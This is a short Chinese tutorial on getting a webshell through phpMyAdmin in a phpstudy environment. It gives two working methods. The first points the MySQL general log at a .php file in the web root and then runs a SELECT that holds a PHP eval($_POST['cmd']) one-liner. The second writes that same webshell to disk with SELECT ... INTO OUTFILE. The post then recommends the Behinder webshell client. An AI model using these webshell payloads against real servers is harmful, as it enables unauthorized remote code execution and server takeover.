常见cms漏洞之PhPMyadmin

环境phpstudy

安装后直接访问即可密码为mysql的密码,在小皮中即可查看

通过日志文件拿Shell

利用mysql日志文件写shel,这个日志可以在mysql里改变它的存放位置,登录phpmyadmin可以修改这个存放位置,并且可以修改它的后缀名。所以可以修改成php的后缀名就能获取一个webshell。

把值修改为on,以及www下的php文件

然后去select语句

复制代码
select "<?php phpinfo();eval($_POST['cmd']);?>"

导入导出拿WebShell

1.首先判断mysql位置

复制代码
select @@datadir

2.猜测web路径猜测web路径扩展的同级目录下存在www目录

复制代码
C:\phpstudy_pro\WWW\222.php

3.写入webshell

复制代码
select  "<?php phpinfo();@eval($_POST[cmd]);" into outfile "C:/phpstudy_pro/WWW/222.php"

对webshell使用冰蝎吧!

相关推荐
plainGeekDev10 分钟前
Android 专家岗 Kotlin 面试题:能答出这些,说明你对语言设计有自己的理解
android·kotlin
plainGeekDev15 分钟前
Android 资深岗 Kotlin 面试题:只会用协程不够,你得懂它为什么这么设计
android·kotlin
StarShip26 分钟前
第一阶段:应用层视图绘制
android
StarShip29 分钟前
第二阶段:RenderThread 渲染处理
android
通玄1 小时前
Jetpack Compose 入门系列(一):从零搭建到基础控件使用
android
StarShip1 小时前
Android 图形渲染流水线完整架构与执行流程分析
android
流年如夢1 小时前
类和对象(上)
android·java·开发语言
用户86022504674722 小时前
从入门到进阶的 React Native 实战指南
android·前端
沐言人生2 小时前
ReactNative 源码分析10——Native View创建流程createView
android·react native